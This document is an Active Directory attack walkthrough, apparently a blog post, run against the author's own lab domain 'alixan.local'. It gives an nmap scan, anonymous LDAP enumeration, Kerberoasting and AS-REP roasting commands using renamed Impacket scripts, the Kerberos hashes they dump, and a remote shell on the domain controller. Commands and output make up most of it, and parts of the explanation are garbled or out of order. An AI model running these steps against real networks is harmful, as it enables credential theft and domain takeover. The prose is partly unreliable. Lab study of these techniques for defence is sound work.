There are 3 VMs before us DC 2019,CLIENT,Kali
Let’s do a port scan on the DC.
nmap -p- -A -T4 192.168.100.101
Starting Nmap 7.91 ( https://nmap.org ) at 2021–09–01 14:24 EDT
Nmap scan report for 192.168.100.101
Host is up (0.00093s latency).
Not shown: 65515 filtered portsPORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021–09–01 18:30:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: alixan.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: alixan)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: alixan.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49687/tcp open msrpc Microsoft Windows RPC
60646/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:AE:396 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|Vista|2008|7 (96%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2016 (96%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 (88%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: SRVDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h24m35s, deviation: 4h02m29s, median: 4m34s
|_nbstat: NetBIOS name: SRVDC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:ae:39:d6 (Oracle VirtualBox virtual NIC)
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: SRVDC
| NetBIOS computer name: SRVDC\x00
| Domain name: alixan.local
| Forest name: alixan.local
| FQDN: SRVDC.alixan.local
|_ System time: 2021–09–01T11:31:34–07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021–09–01T18:31:33
|_ start_date: 2021–09–01T17:33:59
TRACEROUTE
HOP RTT ADDRESS
1 0.93 ms 192.168.100.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.18 seconds
Most of the time we need a user to make a good enum. However, in some scenarios you may find that anonymous logins are allowed with ldap.
PS:ADSI EDIT > SERVICES > WINDOWS NT > DIRECTROY SERVICE > dSHEURISTICS 000002 let’s do.
After this operation is performed, ANONYMOUS LOGON should be added if it is not present in the system.
ldapsearch -x -h 192.168.100.101 -b “DC=alixan,DC=local”# extended LDIF
# LDAPv3
# base <> (default) with scope subtree
# filter: (objectclass=*)
# requesting: ALL
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C0909AF, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v3839
# numResponses: 1
Actually, you have created a vulnerable lab environment. Now let’s check whether there is an anonymous login or not.For this, ldapsearch application can be used and it will be installed in defaul. The -x parameter performs this check. Under normal conditions, when anonymous logon is not present, it produces an output as follows.
Let’s try a few more with another tool, windapsearch.
python3 windapsearch.py -U — dc-ip 192.168.100.101
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 192.168.100.101
[+] Getting defaultNamingContext from Root
[+] Found: DC=alixan,DC=local
[+] Attempting bind
[+] …success! Binded as:
[+] None
[+] Enumerating all AD users
[!] Error retrieving users
[!] {‘desc’: ‘Operations error’, ‘info’: ‘000004DC: LdapErr: DSID-0C0909AF, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v3839’}
You can enter anonymous like this.
If we want to have a rough information about the domain, the nmap output will give us the answer. You can do a simple nmap scan like the one below.
nmap -p 389 --script ldap-* 192.168.100.101
Kerberoasting is an attack technique used to crack the passwords of service accounts.Kerberoasting can be used to gain access to services, raise rights and privileges on the target system, and provide persistence on the target system.
python3 windapsearch.py -U — user-spns — dc-ip 192.168.100.101 -u alice@alixan.local -p Password
[+] Using Domain Controller at: 192.168.100.101
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=alixan,DC=local
[+] Attempting bind
[+] …success! Binded as:
[+] u:alixan\alice
[+] Enumerating all AD users
[+] Found 8 users
cn: Administrator
cn: Guest
cn: DefaultAccount
cn: krbtgt
cn: Alice Princess
userPrincipalName: alice@alixan.local
cn: Shrek Shrek
userPrincipalName: shrek@alixan.local
cn: Mark Man
userPrincipalName: mark@alixan.local
cn: SQL Database
userPrincipalName: sqldatabase@alixan.local
[+] Attempting to enumerate all User objects with SPNs
[+] Found 1 Users with SPNs:
CN=SQL Database,CN=Users,DC=alixan,DC=local
[*] Bye!
Yes we detected a user with SPN value
─# python3 sss -request -dc-ip 192.168.100.101 alixan.local/administratorImpacket v0.9.24.dev1+20210827.162957.5aa97fa7 — Copyright 2021 SecureAuth CorporationPassword:ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — SRVDC/sqldatabase.alixan.local:1337 sqldatabase CN=Group Policy Creator Owners,CN=Users,DC=alixan,DC=local 2021–09–01 13:45:05.665182 <never>$krb5tgs$23$*sqldatabase$alixan.LOCAL$alixan.local/sqldatabase*$2d903a5247d3c1fef115526868e07924$d539a8ab1dc51b4fc193cb6ce4c2a12eb9506c657b76546598fda7caaf26229742be7226a57094e27c3e2e5e6c4432de9e6d6949e1bc7715587f33e8db4826b76471824a70561b9663142f36ed369320e75ad69262e2f03634b30b02685bc2c3a6227d997255109d1be66b3b51a94c527d490727679c1b9b8c0016ae03a46bf1754fb139f7dc9cd080121adbce6f82f15de8562aefb469d0c72f0ad4f4cbfaa762fba6f1c91de113db28e435b54fe1e5edeb07ee189c6c24e4eacc2679fccd82b3724726f23d3a8de1657cda6d56f2f74f4f94c06fba697b0cf5982d1e0723c16f53906f918e525c4fb9e94a54af00c8f25a2ddca98ff16adc187f9674d4c6590b9ae7167ba8feb401c5911988212be2502b967e8dc2839e1014915d6a5012f7695357260ce174b222fa41005bc2282f44e9ba7b44e4562d70d78a42ecba763e716ae90c11d76cb4d0bee1e5c128ddd953b2af848b6ed15b24c20e25a0c1a49b043141f406a09b2d5f2a92b42406c4e65b495f9bc19b0b2ac3493aea4c35abe2eac4910401f7567d52e1543e8fb35a6b0f05f58036208e763e6a2c89f32dbd93d1cd6d610eb8e645540ddda864ecde9173d96b1cc8c7fcae670a7e7981e426b8dd051a3e4896595207bc100a338e7673adf8048e44380a2c3ec49d6637b11c5d8ae2959fa0163db0eb97550d82873c92d04b073a14473af23509df262874fa3df2f6a07737efbeb3ade8e18e1ec6cd0b45c8f5c377c8761a883409708f3ad4e00adb5719cf338f80950fe8435663510f063a2cd01997c911261f793a2ab1eb49178dd21c60854dd99909f3a4741f277dcafd660afb810216fc041c4c1526e04674d48eb1e52eba5a37e6f56fb0a5a5226951a7903dc4f0803a1d2b13bc00835e5b51f832ed29125050cdf7978333cab562aa00b1fe45f513d1a12f5d584455e06674b0999009efb4b4c0df98ff1d9be3e102ec221871f0205d84d13949eb6aa364197e9ea3898ff1769a5766c92c5fb3af20cebdf06770323c9bb562509f37fe4253d4e043959096e745f33d2ace060a122c138d87d9f0aa23e920ea410141aa0bf60b0d8b45fab993a28d7c985ff5a59c96e620d6260f528e4683ebcc12c7f6562bff62b843355f4116a86ed21f67270c40f1b72fc93fe5cefca26bc669005007ff2586a2374837825e008782bd414bc649877c2dbca0afa530ca32be7325b28daa16f1a4697f256f534bc52801314f82065b488457fa3b9d8344cc7f528ed6ad1600a967887357418de5931082724a329eddbae3eb6cef75edd039c607977b5ec3d8a090c5beced226defa44a8c4f3229595409e0fe282c0a3620757f54d7de20266e8ac3a80029bcbaf889c2847de6d006555b8836960f1e8ee6c53f5acc4c3d7da960b4b5a11e567e56665c2940bc1301af971d1b5
You can crack the HASH password with John, but I don’t because I know my password. Now we can log in.
└─# python3 ddd.py alixan/administrator:Password@192.168.100.101
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 — Copyright 2021 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell — Careful what you execute
[!] Press help for extra shell commands
C:\>
AS-REP Roasting Attack
While authenticating with Kerberos, timestamp is used in encryption part, DC decodes and checks this timestamp. In this way, brute force attacks can be prevented.
python3 jjj.py alixan.local/administrator -requestImpacket v0.9.24.dev1+20210720.100427.cd4fe47c — Copyright 2021 SecureAuth CorporationPassword:Name MemberOf PasswordLastSet LastLogon UAC — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — Administrator CN=Adminstrator,CN=Users,DC=alixan,DC=local 2021–07–21 06:45:46.182240 <never> 0x410200$krb5asrep$23$Administrator@alixan.LOCAL:7f9c1e197d5e5e4b5944e68427c83d71$fbc33d008b8564a4a69c06be4dbddaba01a65b316a94102df96b59bc1bbeb7c99022e4f2229721010f22032abbf42e9dcda42352eb140bf2998b6dfcd5dfb9d25089e3a1cbbbd29ee9ad84523bcf68541c965d4c79589492c93b33b74395b427e9063be7b9e507d51cb02911e37d38013794f6381fd47ecd3180d6a50a15d297925c8d9615829ff49a5644c93b72c0674f700d1cce27f39d704de0d436a4b644559fd7636db8c9ce9cee2f86ccab8e2fdd7afd1aa76406120a7df2a602f722d0d2790666fdbd20f9c4316186f9783bce61807c2bd9dfa07bf965330ec98ce3da8aa55f1d27cbed996d46
You can crack the hash with John.
Referances : https://awakesecurity.com/blog/kerberoasting-threat-hunting-for-active-directory-attacks/